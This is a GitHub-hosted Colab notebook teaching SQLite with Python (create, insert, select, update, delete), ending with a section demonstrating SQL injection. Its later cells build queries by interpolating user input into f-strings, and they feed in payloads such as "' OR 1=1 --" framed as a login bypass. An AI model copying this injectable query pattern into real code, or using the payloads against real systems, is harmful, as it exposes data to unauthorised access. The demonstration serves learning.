Created
March 16, 2023 16:09
-
-
Save imvickykumar999/a59ad110a3c60f0d93d4284c67fa5404 to your computer and use it in GitHub Desktop.
SQL Tutorial.ipynb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"nbformat": 4, | |
"nbformat_minor": 0, | |
"metadata": { | |
"colab": { | |
"provenance": [], | |
"authorship_tag": "ABX9TyM85ZDS7DDhk+S1rT37HR/o", | |
"include_colab_link": true | |
}, | |
"kernelspec": { | |
"name": "python3", | |
"display_name": "Python 3" | |
}, | |
"language_info": { | |
"name": "python" | |
} | |
}, | |
"cells": [ | |
{ | |
"cell_type": "markdown", | |
"metadata": { | |
"id": "view-in-github", | |
"colab_type": "text" | |
}, | |
"source": [ | |
"<a href=\"https://colab.research.google.com/gist/imvickykumar999/a59ad110a3c60f0d93d4284c67fa5404/sql-tutorial.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>" | |
] | |
}, | |
{ | |
"cell_type": "markdown", | |
"source": [ | |
"# [SQL using Python](https://www.geeksforgeeks.org/sql-using-python)" | |
], | |
"metadata": { | |
"id": "uJ6gZ9cKLCfx" | |
} | |
}, | |
{ | |
"cell_type": "code", | |
"execution_count": null, | |
"metadata": { | |
"id": "xtpN4QPzK2Tg" | |
}, | |
"outputs": [], | |
"source": [ | |
"# ! pip install mysql-connector-python" | |
] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"import sqlite3" | |
], | |
"metadata": { | |
"id": "rdybIaySLMwN" | |
}, | |
"execution_count": null, | |
"outputs": [] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"sqliteConnection = sqlite3.connect('gfg.db')\n", | |
"sqliteConnection" | |
], | |
"metadata": { | |
"colab": { | |
"base_uri": "https://localhost:8080/" | |
}, | |
"id": "PEtzpDBox4VV", | |
"outputId": "25b3751d-ef29-43f7-c421-b6ed97aa58a8" | |
}, | |
"execution_count": null, | |
"outputs": [ | |
{ | |
"output_type": "execute_result", | |
"data": { | |
"text/plain": [ | |
"<sqlite3.Connection at 0x7f6ff85626c0>" | |
] | |
}, | |
"metadata": {}, | |
"execution_count": 8 | |
} | |
] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"cursor = sqliteConnection.cursor()\n", | |
"cursor" | |
], | |
"metadata": { | |
"colab": { | |
"base_uri": "https://localhost:8080/" | |
}, | |
"id": "sYr0bX-Tyk1B", | |
"outputId": "ec5a59e9-7ee9-4426-c688-4b8d89b90436" | |
}, | |
"execution_count": null, | |
"outputs": [ | |
{ | |
"output_type": "execute_result", | |
"data": { | |
"text/plain": [ | |
"<sqlite3.Cursor at 0x7f6ff81a7260>" | |
] | |
}, | |
"metadata": {}, | |
"execution_count": 9 | |
} | |
] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"import sqlite3\n", | |
" \n", | |
"# connecting to the database\n", | |
"connection = sqlite3.connect(\"gfg.db\")\n", | |
" \n", | |
"# cursor\n", | |
"crsr = connection.cursor()\n", | |
" \n", | |
"# print statement will execute if there\n", | |
"# are no errors\n", | |
"print(\"Connected to the database\")\n", | |
" \n", | |
"# close the connection\n", | |
"connection.close()" | |
], | |
"metadata": { | |
"colab": { | |
"base_uri": "https://localhost:8080/" | |
}, | |
"id": "oSxdPslOy9PP", | |
"outputId": "537458a1-87b0-4483-e684-fd5af45c9bd8" | |
}, | |
"execution_count": null, | |
"outputs": [ | |
{ | |
"output_type": "stream", | |
"name": "stdout", | |
"text": [ | |
"Connected to the database\n" | |
] | |
} | |
] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"import sqlite3\n", | |
" \n", | |
"# connecting to the database\n", | |
"connection = sqlite3.connect(\"gfg.db\")\n", | |
" \n", | |
"# cursor\n", | |
"crsr = connection.cursor()\n", | |
" \n", | |
"# SQL command to create a table in the database\n", | |
"sql_command = \"\"\"\n", | |
"CREATE TABLE emp (\n", | |
"staff_number INTEGER PRIMARY KEY,\n", | |
"fname VARCHAR(20),\n", | |
"lname VARCHAR(30),\n", | |
"gender CHAR(1),\n", | |
"joining DATE);\n", | |
"\"\"\"\n", | |
" \n", | |
"# execute the statement\n", | |
"crsr.execute(sql_command)\n", | |
" \n", | |
"# close the connection\n", | |
"connection.close()" | |
], | |
"metadata": { | |
"id": "R2TUGvLwzrei" | |
}, | |
"execution_count": null, | |
"outputs": [] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"# Python code to demonstrate table creation and\n", | |
"# insertions with SQL\n", | |
" \n", | |
"# importing module\n", | |
"import sqlite3\n", | |
" \n", | |
"# connecting to the database\n", | |
"connection = sqlite3.connect(\"gfg.db\")\n", | |
" \n", | |
"# cursor\n", | |
"crsr = connection.cursor()\n", | |
" \n", | |
"# SQL command to insert the data in the table\n", | |
"sql_command = \"\"\"\n", | |
"INSERT INTO emp VALUES (23, \"Rishabh\", \"Bansal\", \"M\", \"2014-03-28\");\n", | |
"\"\"\"\n", | |
"crsr.execute(sql_command)\n", | |
" \n", | |
"# another SQL command to insert the data in the table\n", | |
"sql_command = \"\"\"\n", | |
"INSERT INTO emp VALUES (1, \"Bill\", \"Gates\", \"M\", \"1980-10-28\");\n", | |
"\"\"\"\n", | |
"crsr.execute(sql_command)\n", | |
" \n", | |
"# To save the changes in the files. Never skip this.\n", | |
"# If we skip this, nothing will be saved in the database.\n", | |
"connection.commit()\n", | |
" \n", | |
"# close the connection\n", | |
"connection.close()" | |
], | |
"metadata": { | |
"id": "aGyNlqyp1YJz" | |
}, | |
"execution_count": null, | |
"outputs": [] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"# importing module\n", | |
"import sqlite3\n", | |
" \n", | |
"# connecting to the database\n", | |
"connection = sqlite3.connect(\"gfg.db\")\n", | |
" \n", | |
"# cursor\n", | |
"crsr = connection.cursor()\n", | |
" \n", | |
"# primary key\n", | |
"pk = [2, 3, 4, 5, 6]\n", | |
" \n", | |
"# Enter 5 students first names\n", | |
"f_name = ['Nikhil', 'Nisha', 'Abhinav', 'Raju', 'Anshul']\n", | |
" \n", | |
"# Enter 5 students last names\n", | |
"l_name = ['Aggarwal', 'Rawat', 'Tomar', 'Kumar', 'Aggarwal']\n", | |
" \n", | |
"# Enter their gender respectively\n", | |
"gender = ['M', 'F', 'M', 'M', 'F']\n", | |
" \n", | |
"# Enter their joining data respectively\n", | |
"date = ['2019-08-24', '2020-01-01', '2018-05-14', '2015-02-02', '2018-05-14']\n", | |
" \n", | |
"for i in range(5):\n", | |
" # This is the q-mark style:\n", | |
" crsr.execute(f'INSERT INTO emp VALUES ({pk[i]}, \"{f_name[i]}\", \"{l_name[i]}\", \"{gender[i]}\", \"{date[i]}\")')\n", | |
" \n", | |
"# To save the changes in the files. Never skip this.\n", | |
"# If we skip this, nothing will be saved in the database.\n", | |
"connection.commit()\n", | |
" \n", | |
"# close the connection\n", | |
"connection.close()" | |
], | |
"metadata": { | |
"id": "Oe4e446T1x1R" | |
}, | |
"execution_count": null, | |
"outputs": [] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"# importing the module\n", | |
"import sqlite3\n", | |
" \n", | |
"# connect with the myTable database\n", | |
"connection = sqlite3.connect(\"gfg.db\")\n", | |
" \n", | |
"# cursor object\n", | |
"crsr = connection.cursor()\n", | |
" \n", | |
"# execute the command to fetch all the data from the table emp\n", | |
"crsr.execute(\"SELECT * FROM emp\")\n", | |
" \n", | |
"# store all the fetched data in the ans variable\n", | |
"ans = crsr.fetchall()\n", | |
" \n", | |
"# Since we have already selected all the data entries\n", | |
"# using the \"SELECT *\" SQL command and stored them in\n", | |
"# the ans variable, all we need to do now is to print\n", | |
"# out the ans variable\n", | |
"for i in ans:\n", | |
" print(i)" | |
], | |
"metadata": { | |
"colab": { | |
"base_uri": "https://localhost:8080/" | |
}, | |
"id": "v9BVXNxD2aTv", | |
"outputId": "5a897489-9cb1-4ceb-f506-d6225b1d1466" | |
}, | |
"execution_count": null, | |
"outputs": [ | |
{ | |
"output_type": "stream", | |
"name": "stdout", | |
"text": [ | |
"(1, 'Bill', 'Gates', 'M', '1980-10-28')\n", | |
"(2, 'Nikhil', 'Aggarwal', 'M', '2019-08-24')\n", | |
"(3, 'Nisha', 'Rawat', 'F', '2020-01-01')\n", | |
"(4, 'Abhinav', 'Tomar', 'M', '2018-05-14')\n", | |
"(5, 'Raju', 'Kumar', 'M', '2015-02-02')\n", | |
"(6, 'Anshul', 'Aggarwal', 'F', '2018-05-14')\n", | |
"(23, 'Rishabh', 'Bansal', 'M', '2014-03-28')\n" | |
] | |
} | |
] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"type(ans[0])" | |
], | |
"metadata": { | |
"colab": { | |
"base_uri": "https://localhost:8080/" | |
}, | |
"id": "OwWCCkSZ2wTc", | |
"outputId": "a38d1d28-7ae1-4850-da00-9843c4929a68" | |
}, | |
"execution_count": null, | |
"outputs": [ | |
{ | |
"output_type": "execute_result", | |
"data": { | |
"text/plain": [ | |
"tuple" | |
] | |
}, | |
"metadata": {}, | |
"execution_count": 17 | |
} | |
] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"# Import module\n", | |
"import sqlite3\n", | |
" \n", | |
"# Connecting to sqlite\n", | |
"conn = sqlite3.connect('gfg.db')\n", | |
" \n", | |
"# Creating a cursor object using\n", | |
"# the cursor() method\n", | |
"cursor = conn.cursor()\n", | |
" \n", | |
"# Updating\n", | |
"cursor.execute('''\n", | |
"UPDATE emp SET lname = \"Jyoti\" WHERE fname=\"Rishabh\";\n", | |
"''')\n", | |
" \n", | |
"# Commit your changes in the database\n", | |
"conn.commit()\n", | |
" \n", | |
"# Closing the connection\n", | |
"conn.close()" | |
], | |
"metadata": { | |
"id": "Rg1B7zJC24JR" | |
}, | |
"execution_count": null, | |
"outputs": [] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"crsr.execute(\"SELECT * FROM emp\")\n", | |
"ans = crsr.fetchall()\n", | |
"ans" | |
], | |
"metadata": { | |
"colab": { | |
"base_uri": "https://localhost:8080/" | |
}, | |
"id": "1gpLYjOW3ZA-", | |
"outputId": "60ae7398-50ef-427d-d097-bca96ae9c932" | |
}, | |
"execution_count": null, | |
"outputs": [ | |
{ | |
"output_type": "execute_result", | |
"data": { | |
"text/plain": [ | |
"[(1, 'Bill', 'Gates', 'M', '1980-10-28'),\n", | |
" (2, 'Nikhil', 'Aggarwal', 'M', '2019-08-24'),\n", | |
" (3, 'Nisha', 'Rawat', 'F', '2020-01-01'),\n", | |
" (4, 'Abhinav', 'Tomar', 'M', '2018-05-14'),\n", | |
" (5, 'Raju', 'Kumar', 'M', '2015-02-02'),\n", | |
" (6, 'Anshul', 'Aggarwal', 'F', '2018-05-14'),\n", | |
" (23, 'Rishabh', 'Jyoti', 'M', '2014-03-28')]" | |
] | |
}, | |
"metadata": {}, | |
"execution_count": 22 | |
} | |
] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"# Import module\n", | |
"import sqlite3\n", | |
" \n", | |
"# Connecting to sqlite\n", | |
"conn = sqlite3.connect('gfg.db')\n", | |
" \n", | |
"# Creating a cursor object using\n", | |
"# the cursor() method\n", | |
"cursor = conn.cursor()\n", | |
" \n", | |
"# Updating\n", | |
"cursor.execute('''\n", | |
"DELETE FROM emp WHERE fname=\"Rishabh\";\n", | |
"''')\n", | |
" \n", | |
"# Commit your changes in the database\n", | |
"conn.commit()\n", | |
" \n", | |
"# Closing the connection\n", | |
"conn.close()" | |
], | |
"metadata": { | |
"id": "OWcjKIVc3gmS" | |
}, | |
"execution_count": null, | |
"outputs": [] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"crsr.execute(\"SELECT * FROM emp\")\n", | |
"ans = crsr.fetchall()\n", | |
"ans" | |
], | |
"metadata": { | |
"colab": { | |
"base_uri": "https://localhost:8080/" | |
}, | |
"id": "3ANEgzAK3zAT", | |
"outputId": "b2198661-a1b3-4862-edc4-5119535261b2" | |
}, | |
"execution_count": null, | |
"outputs": [ | |
{ | |
"output_type": "execute_result", | |
"data": { | |
"text/plain": [ | |
"[(1, 'Bill', 'Gates', 'M', '1980-10-28'),\n", | |
" (2, 'Nikhil', 'Aggarwal', 'M', '2019-08-24'),\n", | |
" (3, 'Nisha', 'Rawat', 'F', '2020-01-01'),\n", | |
" (4, 'Abhinav', 'Tomar', 'M', '2018-05-14'),\n", | |
" (5, 'Raju', 'Kumar', 'M', '2015-02-02'),\n", | |
" (6, 'Anshul', 'Aggarwal', 'F', '2018-05-14')]" | |
] | |
}, | |
"metadata": {}, | |
"execution_count": 24 | |
} | |
] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"import sqlite3\n", | |
" \n", | |
"# connecting to the database\n", | |
"connection = sqlite3.connect(\"gfg.db\")\n", | |
" \n", | |
"# cursor\n", | |
"crsr = connection.cursor()\n", | |
" \n", | |
"# SQL command to create a table in the database\n", | |
"sql_command = \"\"\"\n", | |
"CREATE TABLE Student (\n", | |
"staff_number INTEGER PRIMARY KEY,\n", | |
"fname VARCHAR(20),\n", | |
"lname VARCHAR(30),\n", | |
"gender CHAR(1),\n", | |
"joining DATE);\n", | |
"\"\"\"\n", | |
" \n", | |
"# execute the statement\n", | |
"crsr.execute(sql_command)\n", | |
" \n", | |
"# close the connection\n", | |
"connection.close()" | |
], | |
"metadata": { | |
"id": "udaC846H4iui" | |
}, | |
"execution_count": null, | |
"outputs": [] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"# Import module\n", | |
"import sqlite3\n", | |
" \n", | |
"# Connecting to sqlite\n", | |
"conn = sqlite3.connect('gfg.db')\n", | |
" \n", | |
"# Creating a cursor object using\n", | |
"# the cursor() method\n", | |
"cursor = conn.cursor()\n", | |
" \n", | |
"# Updating\n", | |
"cursor.execute('''\n", | |
"DROP TABLE Student;\n", | |
"''')\n", | |
" \n", | |
"# Commit your changes in the database\n", | |
"conn.commit()\n", | |
" \n", | |
"# Closing the connection\n", | |
"conn.close()" | |
], | |
"metadata": { | |
"id": "muGS4ikm32Gt" | |
}, | |
"execution_count": null, | |
"outputs": [] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"try:\n", | |
" conn = sqlite3.connect('gfg.db')\n", | |
" crsr = conn.cursor()\n", | |
" crsr.execute(\"SELECT * FROM Student\")\n", | |
" ans = crsr.fetchall()\n", | |
" \n", | |
"except Exception as ans:\n", | |
" print(ans)" | |
], | |
"metadata": { | |
"colab": { | |
"base_uri": "https://localhost:8080/" | |
}, | |
"id": "2J05x8554C06", | |
"outputId": "b2b54871-86c6-4d35-e6f8-d76cc0f848f0" | |
}, | |
"execution_count": null, | |
"outputs": [ | |
{ | |
"output_type": "stream", | |
"name": "stdout", | |
"text": [ | |
"no such table: Student\n" | |
] | |
} | |
] | |
}, | |
{ | |
"cell_type": "markdown", | |
"source": [ | |
"# [SQLite - Python](https://www.tutorialspoint.com/sqlite/sqlite_python.htm)" | |
], | |
"metadata": { | |
"id": "6x3qm2ke5DTe" | |
} | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"import sqlite3\n", | |
"\n", | |
"conn = sqlite3.connect('test.db')\n", | |
"\n", | |
"print (\"Opened database successfully\");" | |
], | |
"metadata": { | |
"id": "mWYTJw484pP7", | |
"colab": { | |
"base_uri": "https://localhost:8080/" | |
}, | |
"outputId": "55c48c94-e846-4606-f038-4b70c4d04384" | |
}, | |
"execution_count": null, | |
"outputs": [ | |
{ | |
"output_type": "stream", | |
"name": "stdout", | |
"text": [ | |
"Opened database successfully\n" | |
] | |
} | |
] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"conn = sqlite3.connect('test.db')\n", | |
"\n", | |
"conn.execute('''\n", | |
"CREATE TABLE COMPANY (\n", | |
" ID INT PRIMARY KEY NOT NULL,\n", | |
" NAME TEXT NOT NULL,\n", | |
" AGE INT NOT NULL,\n", | |
" ADDRESS CHAR(50),\n", | |
" SALARY REAL\n", | |
")\n", | |
"''')\n", | |
"\n", | |
"conn.close()" | |
], | |
"metadata": { | |
"id": "8gjWDxCb5PK8" | |
}, | |
"execution_count": null, | |
"outputs": [] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"conn = sqlite3.connect('test.db')\n", | |
"\n", | |
"conn.execute('''\n", | |
"INSERT INTO COMPANY (\n", | |
" ID, NAME, AGE, ADDRESS, SALARY\n", | |
" ) VALUES (\n", | |
" 1, 'Paul', 32, 'California', 20000.00\n", | |
" )\n", | |
"''')\n", | |
"\n", | |
"conn.execute('''\n", | |
"INSERT INTO COMPANY (\n", | |
" ID, NAME, AGE, ADDRESS, SALARY\n", | |
" ) VALUES (\n", | |
" 2, 'Allen', 25, 'Texas', 15000.00\n", | |
" )\n", | |
"''')\n", | |
"\n", | |
"conn.execute('''\n", | |
"INSERT INTO COMPANY (\n", | |
" ID, NAME, AGE, ADDRESS, SALARY\n", | |
" ) VALUES (\n", | |
" 3, 'Teddy', 23, 'Norway', 20000.00\n", | |
" )\n", | |
"''')\n", | |
"\n", | |
"conn.execute('''\n", | |
"INSERT INTO COMPANY (\n", | |
" ID, NAME, AGE, ADDRESS, SALARY\n", | |
" ) VALUES (\n", | |
" 4, 'Mark', 25, 'Rich-Mond', 65000.00\n", | |
" )\n", | |
"''')\n", | |
"\n", | |
"conn.commit()\n", | |
"conn.close()" | |
], | |
"metadata": { | |
"id": "1eNjtmf27IVP" | |
}, | |
"execution_count": null, | |
"outputs": [] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"conn = sqlite3.connect('test.db')\n", | |
"\n", | |
"cursor = conn.execute('''\n", | |
"SELECT ID, NAME, ADDRESS, SALARY FROM COMPANY\n", | |
"''')\n", | |
"\n", | |
"for row in cursor:\n", | |
" print(row)\n", | |
"\n", | |
"conn.close()" | |
], | |
"metadata": { | |
"colab": { | |
"base_uri": "https://localhost:8080/" | |
}, | |
"id": "jgcz_SXw-t0Y", | |
"outputId": "c2039427-4fee-4fb1-e841-6851733109d1" | |
}, | |
"execution_count": null, | |
"outputs": [ | |
{ | |
"output_type": "stream", | |
"name": "stdout", | |
"text": [ | |
"(1, 'Paul', 'California', 20000.0)\n", | |
"(2, 'Allen', 'Texas', 15000.0)\n", | |
"(3, 'Teddy', 'Norway', 20000.0)\n", | |
"(4, 'Mark', 'Rich-Mond', 65000.0)\n" | |
] | |
} | |
] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"conn = sqlite3.connect('test.db')\n", | |
"\n", | |
"NAME = input('Enter NAME : ')\n", | |
"ADDRESS = input('Enter ADDRESS : ')\n", | |
"\n", | |
"command = f'''\n", | |
"SELECT * FROM COMPANY\n", | |
"WHERE NAME='{NAME}' AND ADDRESS='{ADDRESS}'\n", | |
"'''\n", | |
"\n", | |
"print(command)\n", | |
"cursor = conn.execute(command)\n", | |
"\n", | |
"for row in cursor:\n", | |
" print(row)\n", | |
"\n", | |
"conn.close()\n", | |
"\n", | |
"# Getting only one row, without knowing `Address`." | |
], | |
"metadata": { | |
"colab": { | |
"base_uri": "https://localhost:8080/" | |
}, | |
"id": "SuFs7PA3AD41", | |
"outputId": "10359ff1-6712-490b-ce34-ccb14c74e057" | |
}, | |
"execution_count": null, | |
"outputs": [ | |
{ | |
"output_type": "stream", | |
"name": "stdout", | |
"text": [ | |
"Enter NAME : Paul' --\n", | |
"Enter ADDRESS : 123\n", | |
"\n", | |
"SELECT * FROM COMPANY\n", | |
"WHERE NAME='Paul' --' AND ADDRESS='123'\n", | |
"\n", | |
"(1, 'Paul', 32, 'California', 20000.0)\n" | |
] | |
} | |
] | |
}, | |
{ | |
"cell_type": "markdown", | |
"source": [ | |
"# Implementing SQL Injection" | |
], | |
"metadata": { | |
"id": "Wv0DfNnuDK4G" | |
} | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"conn = sqlite3.connect('test.db')\n", | |
"\n", | |
"NAME = input('Enter NAME : ')\n", | |
"ADDRESS = input('Enter ADDRESS : ')\n", | |
"\n", | |
"command = f'''\n", | |
"SELECT * FROM COMPANY\n", | |
"WHERE NAME='{NAME}' AND ADDRESS='{ADDRESS}'\n", | |
"'''\n", | |
"\n", | |
"print(command)\n", | |
"cursor = conn.execute(command)\n", | |
"\n", | |
"for row in cursor:\n", | |
" print(row)\n", | |
"\n", | |
"conn.close()" | |
], | |
"metadata": { | |
"colab": { | |
"base_uri": "https://localhost:8080/" | |
}, | |
"id": "es8m5ragAPDT", | |
"outputId": "73a17130-9be6-4f36-b19b-56ccd552f30e" | |
}, | |
"execution_count": null, | |
"outputs": [ | |
{ | |
"output_type": "stream", | |
"name": "stdout", | |
"text": [ | |
"Enter NAME : ' OR 1=1 --\n", | |
"Enter ADDRESS : 123\n", | |
"\n", | |
"SELECT * FROM COMPANY\n", | |
"WHERE NAME='' OR 1=1 --' AND ADDRESS='123'\n", | |
"\n", | |
"(1, 'Paul', 32, 'California', 20000.0)\n", | |
"(2, 'Allen', 25, 'Texas', 15000.0)\n", | |
"(3, 'Teddy', 23, 'Norway', 20000.0)\n", | |
"(4, 'Mark', 25, 'Rich-Mond', 65000.0)\n" | |
] | |
} | |
] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"import sqlite3\n", | |
"\n", | |
"conn = sqlite3.connect('test.db')\n", | |
"\n", | |
"conn.execute('''\n", | |
"UPDATE COMPANY SET SALARY = 25000.00\n", | |
"WHERE ID = 1\n", | |
"''')\n", | |
"\n", | |
"print('Total number of rows updated : ', conn.total_changes)\n", | |
"\n", | |
"crsr = conn.execute('''\n", | |
"SELECT ID, NAME, ADDRESS, SALARY FROM COMPANY\n", | |
"''')\n", | |
"\n", | |
"conn.commit()\n", | |
"\n", | |
"for row in crsr:\n", | |
" print (\"ID = \", row[0])\n", | |
" print (\"NAME = \", row[1])\n", | |
" print (\"ADDRESS = \", row[2])\n", | |
" print (\"SALARY = \", row[3], \"\\n\")\n", | |
"\n", | |
"print (\"Operation done successfully\")\n", | |
"conn.close()" | |
], | |
"metadata": { | |
"id": "EhjlsADLCysS", | |
"colab": { | |
"base_uri": "https://localhost:8080/" | |
}, | |
"outputId": "7f020d16-2b54-4e10-cdaf-631fa5f1868d" | |
}, | |
"execution_count": null, | |
"outputs": [ | |
{ | |
"output_type": "stream", | |
"name": "stdout", | |
"text": [ | |
"Total number of rows updated : 1\n", | |
"ID = 1\n", | |
"NAME = Paul\n", | |
"ADDRESS = California\n", | |
"SALARY = 25000.0 \n", | |
"\n", | |
"ID = 2\n", | |
"NAME = Allen\n", | |
"ADDRESS = Texas\n", | |
"SALARY = 15000.0 \n", | |
"\n", | |
"ID = 3\n", | |
"NAME = Teddy\n", | |
"ADDRESS = Norway\n", | |
"SALARY = 20000.0 \n", | |
"\n", | |
"ID = 4\n", | |
"NAME = Mark\n", | |
"ADDRESS = Rich-Mond\n", | |
"SALARY = 65000.0 \n", | |
"\n", | |
"Operation done successfully\n" | |
] | |
} | |
] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"import sqlite3\n", | |
"\n", | |
"conn = sqlite3.connect('test.db')\n", | |
"print (\"Opened database successfully\");\n", | |
"\n", | |
"conn.execute(\"DELETE from COMPANY where ID = 2;\")\n", | |
"conn.commit()\n", | |
"print (\"Total number of rows deleted :\", conn.total_changes)\n", | |
"\n", | |
"cursor = conn.execute(\"SELECT id, name, address, salary from COMPANY\")\n", | |
"for row in cursor:\n", | |
" print (\"ID = \", row[0])\n", | |
" print (\"NAME = \", row[1])\n", | |
" print (\"ADDRESS = \", row[2])\n", | |
" print (\"SALARY = \", row[3], \"\\n\")\n", | |
"\n", | |
"print (\"Operation done successfully\")\n", | |
"conn.close()" | |
], | |
"metadata": { | |
"colab": { | |
"base_uri": "https://localhost:8080/" | |
}, | |
"id": "9LDN0E_mr3T8", | |
"outputId": "131143e9-9817-4e9d-bfb0-81f0206645ae" | |
}, | |
"execution_count": null, | |
"outputs": [ | |
{ | |
"output_type": "stream", | |
"name": "stdout", | |
"text": [ | |
"Opened database successfully\n", | |
"Total number of rows deleted : 0\n", | |
"ID = 1\n", | |
"NAME = Paul\n", | |
"ADDRESS = California\n", | |
"SALARY = 25000.0 \n", | |
"\n", | |
"ID = 3\n", | |
"NAME = Teddy\n", | |
"ADDRESS = Norway\n", | |
"SALARY = 20000.0 \n", | |
"\n", | |
"ID = 4\n", | |
"NAME = Mark\n", | |
"ADDRESS = Rich-Mond\n", | |
"SALARY = 65000.0 \n", | |
"\n", | |
"Operation done successfully\n" | |
] | |
} | |
] | |
}, | |
{ | |
"cell_type": "markdown", | |
"source": [ | |
"# [Adding form fields](https://colab.research.google.com/notebooks/snippets/forms.ipynb#scrollTo=TyFZFP2yN3vh)" | |
], | |
"metadata": { | |
"id": "wcyb4K9Vucvq" | |
} | |
}, | |
{ | |
"cell_type": "code", | |
"source": [ | |
"#@title SQL Injection Form { display-mode: \"both\" }\n", | |
"conn = sqlite3.connect('test.db')\n", | |
"\n", | |
"NAME = \"' OR 1=1 --\" #@param {type: \"string\"}\n", | |
"ADDRESS = \"any random password will work\" #@param {type: \"string\"}\n", | |
"\n", | |
"command = f'''\n", | |
"SELECT * FROM COMPANY\n", | |
"WHERE NAME='{NAME}' AND ADDRESS='{ADDRESS}'\n", | |
"'''\n", | |
"print(command)\n", | |
"cursor = conn.execute(command)\n", | |
"\n", | |
"for row in cursor:\n", | |
" print(row)\n", | |
"\n", | |
"conn.close()\n", | |
"#@markdown ---" | |
], | |
"metadata": { | |
"id": "hOIi_WLXsa3C", | |
"colab": { | |
"base_uri": "https://localhost:8080/" | |
}, | |
"outputId": "df3dd574-35d9-4d46-8b6d-ab88ea75dc8b" | |
}, | |
"execution_count": null, | |
"outputs": [ | |
{ | |
"output_type": "stream", | |
"name": "stdout", | |
"text": [ | |
"\n", | |
"SELECT * FROM COMPANY\n", | |
"WHERE NAME='' OR 1=1 --' AND ADDRESS='any random password will work'\n", | |
"\n", | |
"(1, 'Paul', 32, 'California', 25000.0)\n", | |
"(3, 'Teddy', 23, 'Norway', 20000.0)\n", | |
"(4, 'Mark', 25, 'Rich-Mond', 65000.0)\n" | |
] | |
} | |
] | |
}, | |
{ | |
"cell_type": "code", | |
"source": [], | |
"metadata": { | |
"id": "CAR5ykJvt7SS" | |
}, | |
"execution_count": null, | |
"outputs": [] | |
} | |
] | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment